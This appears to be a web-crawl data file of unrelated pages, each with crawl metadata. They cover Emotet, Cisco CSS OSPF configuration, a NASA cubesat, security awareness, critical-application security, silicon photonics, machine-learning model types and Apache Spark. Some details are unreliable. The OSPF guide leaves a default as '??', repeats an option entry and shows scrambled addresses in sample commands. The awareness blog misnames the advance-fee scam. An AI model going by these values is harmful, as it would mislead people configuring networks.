Emotet started out as a banking Trojan in 2014 and has evolved steadily to become a full-fledged threat, sometimes existing as a botnet that had more than 1.5 million machines under its control, according to Check Point Software. The most common consequences of TrickBot infection are bank account fraud, high value cable fraud and ransomware attacks. | <urn:uuid:68b539cd-b4c6-4d77-ad43-27b531f84f9f> | CC-MAIN-2022-40 | https://itsecuritywire.com/quick-bytes/emotet-now-spreading-through-malicious-excel-files/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00115.warc.gz | en | 0.969674 | 142 | 2.5625 | 3 |
Open Shortest Path First (OSPF) is a link state routing protocol that maintains a local view of each area at each router, and to which a router may have an attached interface. When an OSPF router comes up, it exchanges hello messages to discover its neighbors and (in the case of a Local Area Network (LAN)) elects Designated and Backup Designated Routers (DR and BDR). At this stage, it records its state in the neighbor structures. Then, it proceeds to build its local view of the area.
First, the router exchanges a database summary message with its immediate neighbors. These messages are used to determine which Link State Advertisements (LSAs) need to be requested from the neighbors. The replies to the Link State Requests (LSRs) are the Link State Updates (LSUs) that are sent until the neighbor acknowledges in a link state acknowledgment. The process of achieving synchronization among all routers in an area is known as routing convergence. In the case of a LAN, the database synchronization occurs between the routers and the DR and BDR separately. There is no router-to-router exchange other than with the DR or BDR, hence the number of messages is considerably reduced. OSPF supports the notion of hierarchical routing. For example, an Autonomous System (AS) is organized into areas containing no more than 50 routers, and a backbone area (area 0). Each area must contain at least one router with an interface in the backbone area. In addition, the backbone area must be connected. In other words, the routers in the backbone area must be connected either directly by links in the backbone area or by a "virtual link" that crosses a transit area.
OSPF is intended for use where customers are currently running OSPF as their routing protocol and need the Content Services Switch (CSS) 11000 content services switch to participate in the learning and advertising of OSPF routes.
The following are two examples of when customers would run OSPF on the CSS:
When the CSS is used in a transparent or proxy cache environment where it is placed in the middle of the network and needs to learn routes back to clients.
In a firewall load balancing implementation where the firewall routes need to be redistributed into the OSPF domain downstream from the CSS.
For more information on document conventions, see the Cisco Technical Tips Conventions.
There are no specific prerequisites for this document.
This document is not restricted to specific software and hardware versions.
The information presented in this document was created from devices in a specific lab environment. All of the devices used in this document started with a cleared (default) configuration. If you are working in a live network, ensure that you understand the potential impact of any command before using it.
The CSS 11000 implementation of OSPF supports the following:
The ability to route in a single area between other OSPF routers (inter-area routes support).
The ability to route in multiple areas between OSPF routers (inter-area route support).
Hierarchical routing across multiple areas.
Route summarization between areas.
The AS boundary router support.
The stub-area support.
Routing Information Protocol (RIP) route leakage.
Redistribution of local, RIP, static, and firewall route into OSPF domain.
Management Information Base (MIB) per Request for Comments (RFC) 1850.
Perform the steps below to configure OSPF.
Configure an OSPF router ID. It is recommended that the IP address of the first OSPF interface be used.
Configure an OSPF area. OSPF backbone area 0.0.0.0 is created by default.
Configure OSPF on an IP interface. The interface is added into the backbone area by default.
Enable OSPF on that interface.
Configure the advertisement of Versatile Interface Processors (VIPs) if needed (issue the ospf advertise command). This will advertise that network/host out all OSPF interfaces.
Configure the route redistribution into the OSPF domain, if needed.
Configure the OSPF area summarization, if needed.
advertise - Advertises a route as OSPF AS external through all OSPF interfaces. The default type is type2. Primarily used to advertise a VIP or a range of VIPs into an OSPF domain. The command syntax is shown below.
beta-rules(config)# ospf advertise 220.127.116.11 /32 optional sub commands
Sub commands of the advertise command include the following:
metric - the metric to advertise.
tag - 32-bit tag to advertise.
type1 - Advertise as ASE type 1 (comparable cost to OSPF metric).
metric - Ranges from 1 to 15 and indicates the relative cost of this route. The larger the cost, the less preferable the route. The default is 1.
tag - A 32-bit field attached to each external route. This is not used by the OSPF protocol itself. It may be used to communicate information between AS boundary routers.
type1 - Expressed in the same units as OSPF interface cost (that is, in terms of the link state metric). Type 2 external metrics are an order of magnitude larger; any Type 2 metric is considered greater than the cost of any path internal to the AS. This configuration parameter can be used to have an OSPF domain prefer type1 VIPs over type2.
Note: The CSS must be configured as an Autonomous System Boundary (ASB) router before issuing the type1 command.
area - Configures an OSPF area. By default, area 0.0.0.0 is already configured. You can also specify an area as being a stub area, as shown below.
beta-rules(config)# ospf area 18.104.22.168 stub ?
default-metric - Metric for the default route advertised into the stub area.
send-summaries - Propagates summary LSAs into this stub area.
as-boundary - Configures the CSS as an ASB router.
An ASB is a router that exchanges routing information with routers belonging to other ASs, such as RIP domains. Issue this command to advertise VIPs, local, firewall, and RIP learned routes into an OSPF domain.
default - Advertises a default route as ASE through OSPF. Options include metric , tag , and type1 (type2 is default).
equal-cost - Number of equal cost routes OSPF can use. The range is 1 through 15.
enable - Enables OSPF globally.
range - Configures route summarization between OSPF areas.
beta-rules(config)# ospf range 0.0.0.0 10.10.0.0 255.255.0.0
The OSPF area 0.0.0.0 contains the contiguous networks that you would like to advertise to other areas. You also have the ability to block the advertisement of a range. An example is provided below.
beta-rules(config)# ospf range 0.0.0.0 10.10.0.0 255.255.0.0 block
redistribute - Advertises routes from other protocols through OSPF. Options include the following:
firewall - Advertises firewall routes through OSPF.
local - Advertises local routes through OSPF.
rip - Advertises RIP routes through OSPF.
static - Advertises static routes through OSPF. Sub options are metric , tag , and type1 .
router-id - Configures the OSPF router ID. It is recommended that you use the IP address of the first OSPF interface configured.
The command syntax is shown below.
beta-rules(config-circuit-ip[VLAN2-22.214.171.124])# ospf ?
The command options are shown below.
area - Configures the OSPF area to which this interface belongs. By default, an OSPF interface is already a member of the 0.0.0.0 area.
cost - Sets the cost of sending a packet on this interface. The default cost is 10.
dead - Sets the dead router interval (in seconds) for this interface. It is the number of seconds before the CSS's neighbors will declare it down, when they stop hearing the CSS's hello packets. The default is 40.
enable - Enables OSPF on this interface.
hello - Sets the hello interval (in seconds) for this interface. It is the length of time, in seconds, between the hello packets that the CSS sends on the interface. The default is ten.
password - Sets the simple password (a maximum of eight characters) for this interface. Simple password authentication guards against routers inadvertently joining the routing domain; each router must first be configured with its attached networks' passwords before it can participate in routing. The password is in clear text.
poll - Sets the poll interval (in seconds) for this interface. If a neighboring router has become inactive (hello packets have not been seen for RouterDeadInterval seconds), then it may still be necessary to send hello packets to the dead neighbor. These hello packets are sent at the reduced rate PollInterval, which should be much larger than HelloInterval. The default is ??.
priority - Sets the router priority. When two routers attached to a network both attempt to become the DR, the one with the highest router priority takes precedence. If there is still a tie, the router with the highest router ID takes precedence. A router whose router priority is set to 0 is ineligible to become DR on the attached network. The default is 1.
retransmit - Sets the retransmit interval (in seconds) for this interface. It is the number of seconds between LSA retransmissions, for adjacencies belonging to this interface. It is also used when retransmitting database description and link state request packets. This should be well over the expected round-trip delay between any two routers on the attached network. The setting of this value should be conservative, or needless retransmissions will result. The default is five.
retransmit - Sets the retransmit interval (in seconds) for this interface. It is the number of seconds between LSA retransmissions, for adjacencies belonging to this interface. It is also used when retransmitting database description and link state request packets. This should be well over the expected round-trip delay between any two routers on the attached network. The setting of this value should be conservative, or needless retransmissions will result. The default is 5.
The list below contains sample output from various show ospf commands.
show ospf advertise
beta-rules# show ospf advertise
OSPF Advertise Routes Entries:
Advertise Routes Prefix : 126.96.36.199
Advertise Routes Prefix Length : 32
Advertise Routes Metric : 1
Advertise Routes Type : aseType2
Advertise Routes Tag : 0
Note: In the above show command screen, a VIP with a 32-bit mask is advertised. Defaults are used for the other parameters.
show ospf areas
beta-rules# show ospf areas
Area ID Type SPF Runs Routers Routers LSAs Summaries
-------- ------- -------- --------- -------- ---- ---------
0.0.0.0 Transit 46 0 1 3 N/A
188.8.131.52 Stub 5 0 1 1 Yes
show ospf ase
beta-rules# show ospf ase
Link State ID Router ID Age T Tag Metric Address
--------------- --------------- ---- - -------- -------- ---------------
0.0.0.0 192.168.151.1 1 2 00000000 1 0.0.0.0
184.108.40.206 192.168.151.1 593 2 00000000 1 0.0.0.0
Note: Data traffic for the advertised destination will be forwarded to the forwarding address. If the forwarding address is set to 0.0.0.0, data traffic will be forwarded instead to the LSA's originator (that is, the responsible ASB router).
show ospf global
beta-rules# show ospf global
OSPF Global Summary:
Router ID: 192.168.151.1
Admin Status: enabled
Area Border Router: FALSE
AS Boundary Router: TRUE
External LSAs : 2
LSA Sent : 8
LSA Received : 5
show ospf interfaces
beta-rules# show ospf interfaces
OSPF Interface Summary:
IP Address: 192.168.151.1
Admin State: enabled
Area: 0.0.0.0 Type: broadcast
State: BDR Priority: 1
DR: 192.168.151.2 BDR: 192.168.151.1
Hello: 10 Dead: 40
Transmit Delay: 1 Retransmit: 5
show ospf lsdb
beta-rules# show ospf lsdb
OSPF LSDB Summary:
Area: 0.0.0.0 Type: Router
Link State ID: 192.168.151.1 ADV Router: 192.168.151.1
Area: 0.0.0.0 Type: Router
Link State ID: 192.168.151.2 ADV Router: 192.168.151.2
Area: 0.0.0.0 Type: Network
Link State ID: 192.168.151.2 ADV Router: 192.168.151.2
Area: Type: ASE
Link State ID: 0.0.0.0 ADV Router: 192.168.151.1
Area: Type: ASE
Link State ID: 220.127.116.11 ADV Router: 192.168.151.1
show ospf neighbors
beta-rules# show ospf neighbors
Address Neighbor ID Prio State Type Rxmt_Q
-------- ------------ ------ ------ ----- ------
192.168.151.2 192.168.151.2 1 Full Dynamic 0
show ospf range
beta-rules# show ospf range
Area ID LsdbType Addr Range Mask Range Effect
-------- ----------- ---------- -------------- ---------
18.104.22.168 summaryLink 22.214.171.124 255.0.0.0 advertise
show ospf redistribute
beta-rules# show ospf redistribute
Redistribution via OSPF Summary:
Static Routes Redistribution : disabled
RIP Routes Redistribution : disabled
Local Routes Redistribution : disabled
Firewall Routes Redistribution : disabled
show ip routes ospf
beta-rules# show ip routes ospf
prefix/length next hop if type proto age metric
------------------ --------------- ---- ------ -------- ---------- -----------
126.96.36.199/24 188.8.131.52 1021 remote ospf 5 1 | <urn:uuid:09acceec-bb21-4d93-8e45-593158dc28c2> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/support/docs/application-networking-services/css-11000-series-content-services-switches/12638-OSPF.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00115.warc.gz | en | 0.824716 | 3,469 | 3.234375 | 3 |
A space-focused laboratory within Utah State University has developed a small satellite that would help NASA study cloud water and ice particles on microphysical levels.
USU Space Dynamics Laboratory’s cubesat would carry the HyperAngular Rainbow Polarimeter, an instrument that would introduce the ability to measure aerosol and cloud properties, USU said Thursday.
The University of Maryland, Baltimore County developed the HARP payload with the leadership of J. Vanderlei Martins, the project’s principal investigator.
NanoRacks will launch USU’s satellite with the HARP payload on a Northrop Grumman-made Cygnus cargo spacecraft next month. Cygnus will transport the HARP satellite and payload to the International Space Station.
âWorking together with Dr. Martins and his team at UMBC as well as the NASA Earth Science Technology Office is a great example of academia, industry and government working together to answer scientific questions for the benefit of mankind,â said Tim Neilsen, program manager for HARP at USU SDL. | <urn:uuid:7e2cb048-bc07-4173-80ba-a7a2ed85bf1f> | CC-MAIN-2022-40 | https://executivegov.com/2019/09/utah-state-university-makes-satellite-for-nasa-aerosol-study/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00115.warc.gz | en | 0.912066 | 218 | 2.921875 | 3 |
People’s perceptions have changed. Not so long ago we thought nothing of kids playing outside all day alone, unchaperoned visits to a friend’s house, walking to school alone – the list goes on. But as times have changed, we have become much more vigilant about personal safety. The same can be said for the online world. The majority of us are well-aware of cybercrime and are generally on our guard for suspicious emails and websites. Yet despite this everyday vigilance, social engineers find ways to take advantage of our online behavior.
Cybercrime: We are already suspicious
When it comes to business IT security, company leaders generally want to establish a strong cybersecurity culture within their organizations. It’s a very natural thing to do. Human resources department training typically focuses on awareness and highlights typical mistakes that open the doors to a business’ systems and data. It shines a spotlight on what it means to be aware. But conducting security awareness training is not enough to reduce risk completely. Why? The truth is that most people are already “cyber aware.” We have all already formed an opinion on cybersecurity, and whom we trust.
Just think about it. How often do you hear a knock on the door these days, except from an unexpected visitor? A generation ago, a ringing doorbell was nearly cause for celebration. Everyone in the house leaped into action in near perfect unison. But people’s attitudes have changed. We are now not just suspicious, but actually distrustful, of people knocking on our door. We are conscious that not everyone who calls to the door nowadays is legit. It’s born out of the fact that we are aware of the many door-to-door scams or have been a victim of a cold caller ourselves. Besides, due to smartphones, we already know in advance if someone is dropping by – anyone else is considered an uninvited caller. In this way, the escalation of increasingly invasive marketing and social networking manipulation, coupled with technology that makes us easier to track and easier to target, has driven a culture-wide sense of security awareness.
The same can be said for cybersecurity. Nearly everyone is aware of the classic Nigerian 401 scam. In return for a few thousand dollars, email recipients are guaranteed several million in return. Word spread already years ago that this, and many others like it, was a scam; and people now ignore such basic scams out of habit. Like the bogus salesmen calling to the door, we already have a heightened sense of awareness, causing us to be more cautious.
Cybersecurity training: Awareness alone doesn’t solve the problem
There is no question that awareness of cybersecurity is high now and has been for a couple of years – and that’s a good thing. The problem is that while cyber security training within an organization is well intentioned, it is solely invested in creating awareness. At this point, however, we are way past awareness. People are already suspicious of bogus email, SMS messages and calls.
The real focus should be on personal attack surface, e.g. the aforementioned data that makes us easier to track and to target. Attention needs to be given to the significance of personal information, the sharing of it and how to defend it. While we are “aware” cybercrime exists, many of us may not fully understand the implications of actions that open the door to cybercrime. This is partially why social engineering and other large-scale data breaches are often so successful – and you only need to look at the stats.
A 2017 Tenable survey found that nearly all participants were aware of security breaches. What the survey also revealed was that many admitted to not taking some degree of precaution to protect their personal data and have not changed their security habits in the face of a public threat. Not surprisingly, another study from Stanford University and security firm Tessian revealed that nine in ten (88%) data breach incidents are caused by employees’ mistakes – and costly ones at that. In 2020 alone, data breaches cost businesses an average of $3.86 million.
So, what, in light of this, are the best steps to start mitigating risk?
Reduce Employee Burden: Recognition of a person’s attackable surface
When it comes to reducing risk through employee training, businesses need to recognize that many people fall into one of two categories:
- There are those who are very concerned about personal data security. This cohort want to keep their data safe and do not want anyone “messing” with their personal information. They are already very much engaged with cybersecurity – they are not the problem.
- Then there are those who are the reverse. They are not interested in cyber security. They are aware but they don’t feel at risk, and as such are not willing to spend effort on it.
Trying to “convert” the second group of employees to become champions of cyber hygiene or cybersecurity can be, for a want of a better phrase, a waste of time. Until you can put cybersecurity into personal terms for each person, it is nearly impossible to change entrenched habits and opinions.
However, if you can pinpoint which extra-professional avenues of attack are most likely for an individual’s data profile, you may be able to make progress against this skepticism. It’s about recognition of a person’s attackable surface. Concern for one’s own personal safety will always trump concerns for company safety. Or, put in analog terms, you don’t have to convince suspicious people not to answer the phone; you need to convince them not to publish their phone number in the first place. The smarter everyone is about his or her personal data, the more secure the company will be.
Security awareness training is a common corporate exercise – but is no longer enough to reduce risk. By empowering your employees to safeguard their own digital footprints – along with company data – you can start to develop really formidable foes to cybercrime. | <urn:uuid:b8d0a75c-a304-43e1-9304-3f0b2f20d106> | CC-MAIN-2022-40 | https://getpicnic.com/2021/11/15/cybercrime-awareness-is-no-longer-enough-to-reduce-risk/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00115.warc.gz | en | 0.967514 | 1,232 | 2.53125 | 3 |
Critical applications, categorically, have massive stores of data, are often globally utilized, have complex processing engines, and are entwined with other application services.
These applications are crucial to the everyday operations of organizations but due to their necessity, security teams need to take precautions to prevent attackers from exploiting their weaknesses.
The users of these applications rely so heavily on them working that their importance is most noticed when the apps fail.
Understanding the unique way each critical application operates and is set up for their respective organizations is crucial when identifying certain weaknesses making these apps and their data vulnerable. This knowledge will lead security teams to an awareness of potential risks and in turn, risk management tactics.
Financial Applications are often designed to deal with the specific requirements of financial institutions; these apps are pivotal for revenue and operational flow. But due to the sensitive and confidential nature of financial data, these apps are subjected to stringent regulations. Attackers may look for entry points in the systems connecting the financial organizations to online commerce systems used to process payments from customers.
Medical Applications are used to store, share, and exchange confidential data from a myriad of sources under the hospital umbrella: clinics, doctor’s offices, and specialized facilities. Much like financial applications, the data dealt with from these apps is extremely sensitive. In particular, the matter of a patient’s safety eclipses the importance of other regulations, potentially including security measures. Patient identification can get embedded into the network packet due to protocols ensuring that data is never mixed up or mistaken.
Applications used for Messaging and communication systems are hubs for personal data, outside account and user verifications, private conversations, and potentially compromising information. An analysis of the California Attorney General breach notifications for 2017 showed that 5% of reported significant data breaches were directly attributed to credential exposure via email compromise. The potential for scams aimed at both customers and employees working internally is high when an email account becomes compromised.
Legacy Systems are specialized and customized applications that are used for things like reservation systems and customer management systems. These systems have higher potential of a security breach due to a lack of maintenance and support and, as one-off systems, they are often incompatible with more modern systems and tools. This means they are low performing, but their cost is high.
An important part of risk management is understanding where sources of potential vulnerabilities exist. Most critical application systems share the same vulnerabilities which all serve as possible entry points for attackers. As part of a forthcoming report on protecting applications, F5 commissioned a survey with Ponemon that found that 38% of respondents had “no confidence” in knowing where all their applications existed. Some common vulnerabilities are:
Credential Attacks can be a result of older applications lacking vigorous authentication systems. Authentication gateways are proxies used when a critical app’s system does not support better authentication. These proxies supply higher-level authentication: all access to the critical apps has passage through the gateway, invisibly passing the legacy credentials to the critical apps. Even weaker passwords can be fortified through contemporary technologies such as federation, single sign-on, and multi-factor. Network segregation is needed for these newer authentication technologies to be effective.
Segregation from Exploits and Denial-of-Service Attacks; reduce inbound network traffic to the limited protocols required for the app to be functional through segregation with firewalls and virtual LANs. Without the ability to patch some legacy/specialized applications, a firewall will restrict attempts to connect to vulnerable services. Services like Telnet, Finger, and CharGen that are easily exploited can be blocked from external access by reducing the attack surface. Virtual patching or firewalls with intrusion prevention can also be of help.
Encryption to Prevent Network Interception; any threat that has breached your network and is already inside can be a threat to internal traffic with confidential information. A TLS or a VPN gateway can be employed if the critical application does not support transport protocol. Working similarly to the authentication gateway, these contain traffic passing through to an encrypted tunnel and should also be used for external links from the app and even trusted third parties.
- Ransomware – the scourge of our times
- Creating a Cyber Security Culture with former Arsenal F.C IT Director, Christelle Heikkila
- Demand for ZTNA continues its upward trajectory in 2022
- What does “cyber resilience” mean to Legal IT?
- Where are you on the machine learning and artificial intelligence roadmap? | <urn:uuid:967a2086-2979-407c-9b44-a8d4246f84e0> | CC-MAIN-2022-40 | https://www.netmotionsoftware.com/blog/mobility/mission-critical-applications-and-how-to-protect-them | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00316.warc.gz | en | 0.938549 | 917 | 2.625 | 3 |
Computing historians may look back on 2016 as the Year of Silicon Photonics. Not because the technology has become ubiquitous – that may yet be years away – but because the long-awaited silicon photonics offerings are now commercially available in networking hardware. While the advancements in networking provided by silicon photonics are indisputable, the real game changer is in the CPU.
For over half a century, Moore’s Law has been the name of the game. The transistor density on chips has been remarkably cooperative in doubling on schedule since Gordon Moore first made his observation in 1965. But Moore’s Law is still subject to the constraints of physics. At some point, halving the size of the transistor will mean splitting atoms. It’s likely, of course, that economic constraints will kick in long before anyone introduces a nuclear fission CPU. Indeed, Intel has already shown that economic conditions can act as a brake on Moore’s Law.
This means that chip makers will have to get creative about how they drive performance improvements. Silicon photonics offers a tantalizing approach, as outlined in a paper by Ke Wen and colleagues presented at the Post-Moore’s Era Supercomputing Workshop colocated with Supercomputing 16. Given the limits of raw compute horsepower that are approaching, Wen suggests shifting to other areas for performance gains.
The ability to get data in and out of the CPU is just as important as the ability to pass data between hosts. Memory bandwidth is subject to its own physical limits. Intel’s Knights Landing chip requires 3647 pins per memory stack, and the pins can only be packed so densely. By using silicon photonics, a single waveguide can be used to provide the same bandwidth (100 gigabits per second) as an 8-channel High Bandwidth Memory cube.
The low power requirements and relatively (when compared to copper-based electronics) unlimited transmission distance that silicon photonics provide could potentially lead to a new paradigm in hardware design. At a first pass, systems no longer would need to use non-uniform memory access (NUMA) to enable large memory configurations. This removes the need, both for the operating system and the programmer, to attempt processor affinity in order to keep threads and their data logically nearby.
Fans of silicon photonics further suggest that the very nature of compute hardware may change. The current basic configuration of servers and blades is bound by the need to keep components close for maximum performance, as well as power and cooling. But if data can be passed at high bandwidth, high speed, and low power over great distances, why not reconsider how hardware is designed? If the components can be disaggregated, then systems can be built more modularly. This allows for greater flexibility and upgradeability.
Of course, we aren’t there yet. Silicon photonics only recently hit the networking space.
Vendors like Mellanox, (March), Inphi (March), and Intel (June) have launched silicon photonics products this year. As we reported in August, Intel’s silicon photonics offering was originally expected in early 2015. Indeed, Intel has been working toward this for years.
Getting to this point was not easy; as recently as 15 years ago, this was not considered a feasible solution. Researchers had to develop modulators that could operate in the 10 gigahertz range necessary for high-bandwidth communication. And there was another problem: silicon tends to produce heat, not light, when the electrons are excited. Intel researchers had to develop an electric waveguide field to build up photons in order to create a continuous laser beam. Several teams within Intel worked to make silicon-based lasers a usable reality.
Some hyperscale shops will undoubtedly leap on these offerings, and HPC environments that build out new clusters every year will consider silicon photonics. Intel touted Microsoft Azure as an early adopter of the former’s silicon photonics networking products. The question is how quickly will the rest of the industry come along? Switching from copper to silicon photonics will require replacing the networking gear in large swaths at once. Given that many datacenter managers are still content with gigabit or 10 gigabit at the top of the rack, it’s hard to imagine a sudden, broad uptake. Indeed it may prove that even though the networking side of silicon photonics has a head start in the market, the coming CPU advancements end up with a quicker adoption curve.
While you can be sure that chip makers are actively investigating this as a future product offering, there are no silicon photonics CPUs on the market yet. Intel, for example, is only publicly discussing silicon photonics for networking, not for CPUs. A team of researchers lead by Vladimir Stojanović at UC Berkeley only produced a prototype late last year. The manufacturing process will need to get cheaper and, if we are to reach the disaggregated system goal, manufacturers of other components will need to buy into the idea as well. 2016 may be the first Year of Silicon Photonics, but it’s likely not the last. | <urn:uuid:1aa8dab7-592b-489e-83eb-449e6a0d77e2> | CC-MAIN-2022-40 | https://www.nextplatform.com/2016/12/14/let-light-year-silicon-photonics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00316.warc.gz | en | 0.951512 | 1,043 | 2.859375 | 3 |
Machine learning isn’t a new concept. It’s been around since the 1940s and has been used in a variety of ways. But there has been a renewed emphasis placed on machine learning as more organizations realize the different ways it can be leveraged in data and analytics—both internally and externally.Machine learning—which is the art of using algorithms and computers to do a task better as more data is fed to the algorithm—is a primary type of data science analysis and a subset of artificial intelligence. Machine learning seeks patterns in the data provided and enables a business to use those patterns to make quicker, better decisions.As organizations look to develop their analytics maturity and use advanced analytics such as predictive analytics, machine learning has proven to be an instrumental tool. But not all machine learning is created equal—there are different models you can deploy for different uses cases. In this blog, we will discuss the most common types of machine learning and how they work, and we’ll also cover the different types of ways you can train your machine learning models to help your business remain more agile and become more competitive, as well as best practices to get started.What Are the Different Types of Machine Learning?The two most common types of machine learning are supervised and unsupervised.Supervised learning uses labeled data—data that comes with a tag such as a name, type, or number—and guided learning to train models to classify data or to make accurate predictions. It is the simpler of the two types of machine learning, the most commonly used, and the most accurate because the learning is guided using known historical targets that you can essentially plug in to get the outcome.Unsupervised learning, on the other hand, uses unlabeled data—data that does not come with a tag—to make predictions. It uses artificial intelligence algorithms to identify patterns in datasets and doesn’t have any defined target variable. Unsupervised learning can perform more complex tasks than supervised learning, but it’s also less accurate in its predictions.Both types of machine learning are used to train machine learning models. There are numerous types of models you can build in machine learning, and depending on the type of problem you have, you can use more than just one model to help make your predictions.What Are Machine Learning Models and How Do They Work?Machine learning models are a representation of what a system has learned. They are trained to use input data, recognize patterns using data, make a prediction based on that data, and then provide an output.There are various types of machine learning models and some even overlap in how they work. Some different machine learning models include:Regression is a type of supervised learning and is used to perform regression tasks to predict a numeric value. Typical uses cases for a regression model include things like predicting sales volume or weather forecasting. Examples of questions a regression model can answer include:How will stocks perform next quarter?What will the temperature be in Chicago next week?How much of this product will we sell this year?Classification is also considered to be supervised learning and works to sort data into groups. Classification models rely on existing labeled target data and related independent variables to predict which groups new data belong to. Typical uses cases for a classification model include language or pattern detection, as well as fraud detection. Examples of questions a classification model can answer include:Is this flower a rose or a tulip?Are our customers satisfied or dissatisfied?Is this review positive or negative?Association rule mining is a type of unsupervised learning and is used to infer associations among data points. Association rule mining models help you understand the association between one variable and another and the relevance of that association. Typical uses cases for association rule mining models include medical diagnosis, customer behavior analysis, and user behavior on a website. Examples of questions an association rule mining model can answer include:If customers purchased a bike, are they likely to purchase accessories?Are customers likely to buy beer if they buy diapers?What’s the probability of the occurrence of an illness given other symptoms or comorbidities?Clustering is most commonly used in unsupervised but can also be used in supervised learning. It is used to group similar things together, as well as to detect anomalies. Typical uses cases for the clustering machine learning model include customer segmentation, identifying behavior patterns, or detecting defects. Examples of questions a clustering model can answer include:What genre of movies will this customer watch?Which customers will likely purchase accessories?Will this individual participate in fraudulent activity?Neural networks are non-linear statistical data modeling tools and are leveraged for deep learning algorithms by processing training data the same way the human brain would. Neural networks can be used for prediction, classification, association mining, or clustering. Typical use cases for neural network models include image, audio, and video recognition. But they can also be leveraged in typical business use cases. Examples of questions a neural network model can answer include:What is likelihood of my electronic device failing?Are my manufacturing machines functioning properly?What are the issues causing a breakdown in my manufacturing processes?How Can Machine Learning Make Your Business Agile and Competitive? You may have great data analysts, but it’s difficult to capture the knowledge an individual might have and then be able to repeat it. It’s also difficult to capture all the possibilities that can contribute to a prediction with just the human eye. Your data analyst can look at the same three data points every week and pull that information into a regression model to predict what sales are going to look like this quarter. But what if there’s more to it? Humans are good at detecting patterns but nowhere near as good as a machine is going to be.Machine learning allows you to learn from various features and then take that learning and make it a repeatable process. Machine learning not only helps organizations understand and anticipate customer needs and act accordingly, but it can also help analyze and improve business processes and product development, as well as fine-tune employee recruitment and retention efforts. The sky’s the limit in terms of how machine learning can be leveraged.Understanding how each type of machine learning model works and how it can be used is a start, but ultimately you want to make your learnings a repeatable process so that you can remain agile and competitive.What Are Best Practices to Get Started with Building Machine Learning Models?As you look to get started with machine learning, it’s key to understand that it’s not just about getting answers to questions right now, but rather to make sure that the answers are as accurate as possible and to be able to repeat the process and allow it to evolve. It’s a long-term goal that requires some work upfront, but ultimately the results will allow your business to meet its goals and to improve, keeping pace with the market. Here are some key best practices to follow before starting with machine learning:1.) Machine learning is part of data science. Before you begin to build machine learning models, you need to make sure the quality of your data is high. That involves getting your data organized, cleaned, profiled, and prepared for feature engineering. Without high quality data, you’re likely not going to get good user adoption. You’re also likely to increase the risk that you’re putting on your company and the likelihood that your data is going to be bad in the future.2.) Don’t skip diagnostic analytics in the analytics maturity model. Most businesses that are doing analytics are doing descriptive analytics. From there, they jump to predictive analytics, which is where machine learning comes into play. But it’s that step in between—diagnostic analytics—that sometimes is overlooked. Diagnostic analytics helps you understand the “why” behind your data which helps to build better machine learning models because you already know what’s going into it and it makes them much more interpretable.3.) Leverage business intelligence (BI) tools to enhance interpretability and communication. While you can design visuals using python or R, sharing content with end users can be tricky. We find that best practices involve utilizing existing BI tools—such as Power BI, Tableau, or Qlik Sense—helps with communicating the results of the machine learning. Including how and why a model works in a visual also helps with interpretability and avoids data science in a “black box”. Additionally, using familiar tools, which are highly interactive, allows for easier access, wider adoption, or even discovery of new use cases.4.) Make sure to consider model monitoring after operationalizing machine learning into your processes. Models can incur data drift—which is change in model input data that leads to model performance degradation—over time, potentially providing wrong answers or making the model irrelevant. Inclusion of a plan to monitor the model and maintain the inputs, as well as revisit what you’re targeting, can help ensure continued quality and success of any machine learning effort.5.) Staff accordingly.Data science is a team learning sport. Not only do you need data scientists, but don’t forget to include data engineers, analysts, and subject matter experts in your staffing plans. Having the right people involved can make all the difference. And if you need to supplement data scientists, there is a lot of software out there to help with autoML, such as DataRobot. | <urn:uuid:deb1c739-58da-44cd-8203-568ff2d2d3a4> | CC-MAIN-2022-40 | https://www.analytics8.com/blog/what-are-the-different-types-of-machine-learning-you-can-deploy-and-how-do-you-use-them/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00316.warc.gz | en | 0.945351 | 1,914 | 3.21875 | 3 |
BrandPosts are written and edited by members of our sponsor community. BrandPosts create an opportunity for an individual sponsor to provide insight and commentary from their point-of-view directly to our audience. The editorial team does not participate in the writing or editing of BrandPosts.
By Don Wake
Data engineering, as a separate category of expertise in the world of data science, did not occur in a vacuum. The role of the data engineer originated and evolved as the number of data sources and data products ballooned over the years. Therefore, the role and function of a data engineer is closely associated with a variety of different data-processing platforms such as Apache Hadoop, Apache Spark, and a huge number of specialized tools. In this article, you will find out why Spark should be considered the data engineer’s best friend.
Spark is the ultimate toolkit
Data engineers often work in multiple, complicated environments and perform the complex, difficult, and, at times, tedious work necessary to make data systems operational. Their job is to get the data into a form where others in the data pipeline, like data scientists, can extract value from the data.
Spark has become the ultimate toolkit for data engineers because it simplifies the work environment by providing both a platform to organize and execute complex data pipelines, and a set of powerful tools for storing, retrieving, and transforming data.
Spark doesn’t do everything, and there are lots of important tools outside of Spark that data engineers love. But what Spark does is perhaps the most important thing: It provides a unified environment that accepts data in many different forms and allows all the tools to work together on the same data, passing a data set from one step to the next. Doing this well means you can create data pipelines at scale.
With Spark, data engineers can:
Connect to different data sources in different locations, including cloud sources such as Amazon S3, databases, Hadoop file systems, data streams, web services, and flat files.
Convert different data types into a standard format. The Spark data processing API allows the use of multiple different types of input data. Spark then utilizes Resilient Distributed Datasets (RDDs) and Data Frames for simplified, yet advanced data processing.
Write programs that access, transform, and store the data. Many common programming languages have APIs to integrate Spark code directly, and Spark offers many powerful functions for performing complex ETL-style data cleaning and transformation functions. Spark also includes a high-level API that allows users to seamlessly write queries in SQL.
Integrate with almost every important tool for data wrangling, data profiling, data discovery, and data graphing.
What makes Spark unique
In order to understand why Spark is so special, it is important to compare it to the Hadoop infrastructure, which was crucial earlier in the rise of big data and big data analytics.
